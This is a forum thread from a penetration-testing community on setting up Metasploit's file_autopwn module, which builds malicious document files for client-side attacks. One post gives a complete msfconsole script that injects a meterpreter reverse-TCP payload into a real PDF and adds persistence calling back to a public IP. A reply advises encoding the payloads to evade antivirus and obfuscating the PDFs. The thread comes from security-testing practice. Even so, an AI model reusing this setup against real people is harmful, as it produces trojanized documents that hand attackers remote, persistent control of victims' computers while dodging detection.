Thread: Metasploit auxilary file_autopwn module - Video Tutorial

Default Metasploit auxilary file_autopwn module - Video Tutorial

hi,

the relatively new msf 3 module auxiliary/server/file_autopwn is a very nice little feature to test all known file format client-side attacks.

Using this script will provide you a web page with the relevant msf3 files, where you can perform all your client-side tests for known vulnerabilities.

A quick video how to set it up can be found here...
    http://zerohat.de/_shared_files/vide..._file_autopwn/

/brtw2003

Good friend of the forums

Default Re: Metasploit auxilary file_autopwn module - Video Tutorial

[[solved]] the PDF I was using to inject was causing the error. and also the LPORT_WIN32 is default to 3333 (the rev shell listen port ) not sure how to pass the "OnlyFiles" actions but whatever..
    NICe !

I got no luck with
    windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
    I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:

( tried to replace localhost with my IP to a different host no luck )

http://rmccurdy.com/scripts/msf_shells/out.txt

I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works so maybe I am missing something it looks as tho it is creating the files fine but I get a DOS box popup with the file_autopwn and nothing in wireshark ?

Code:
    rm -Rf /tmp/1 
    mkdir /tmp/1 
    rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf

./msfconsole

db_driver sqlite3
    db_create pentest11
    setg LHOST 75.139.158.51
    setg LPORT 21
    setg SRVPORT 21
    setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
    set SSL true
    set ExitOnSession false
    set PAYLOAD windows/meterpreter/reverse_tcp
    setg PAYLOAD windows/meterpreter/reverse_tcp
    set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
    run
    Last edited by opreat0r; 03-03-2010 at 08:06 PM.

Just burned his ISO

Great content. Will have to try it out.

However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.

Quote Originally Posted by jaykay232 View Post
    Great content. Will have to try it out.

However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.
    well, I'm not a big friend of sophisticated videos, nor explaining a step-by-step-i-m-super-l33t-hack$ng-guide; this info should be enough to start with and dive more into the amazing msf3 development...i know I zoomed too many times, but that's why there is a pause button...

/brtw2003

Quote Originally Posted by opreat0r View Post
    NICe !

I got no luck with
    windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
    I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:

( tried to replace localhost with my IP to a different host no luck )

http://rmccurdy.com/scripts/msf_shells/out.txt

I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works so maybe I am missing something it looks as tho it is creating the files fine but I get a DOS box popup with the file_autopwn and nothing in wireshark ?
    -does you your /tmp/file.pdf exists (you must use a real pdf document)?
    be aware, currently there are also no obfuscation mechanism added, therefore payloads are easily detected by an up-to-date AV (run a simple for loop for all exe files and run msfencode with shikata-ga-nai)

PDF obfuscation, have a look around Didier Stevens blog or compress JS inside, like http://www.jslab.dk/tools.minify.php

for more advanced options, start msf3, load file_autopwn and execute 'show advanced'

/brtw2003
    Last edited by brtw2003; 03-02-2010 at 04:00 PM.

Good friend of the forums

Cool Re: Metasploit auxilary file_autopwn module - Video Tutorial

It was the PDF ! I used the one in your example and it works ( at least with pdf exe)

Just burned his ISO

Nice video / tutorial, Went ahead and gave this a whirl, used just about the same syntax as you, just different locations and such, scripted it out, after running my script I get errors stating
    Code:
    Exploit failed: SQLite3::SQLException: library routine called out of sequence: SELECT * FROM "workspaces" WHERE ("workspaces"."name" = 'default' ) LIMIT 1
    This continues on as it loops through all my file format exploits, when it gets to the end it comes back saying done, found 2 exploit modules, and launches the attack, starts up the folder where I can find vulnerabilities.

I was reading around and it appears this happens if there are too many connections to the database going on at once. I followed your instructions on how to fix an error within metasploit in regards to pools, doing that did not resolve this problem.

Any help is apprecaited.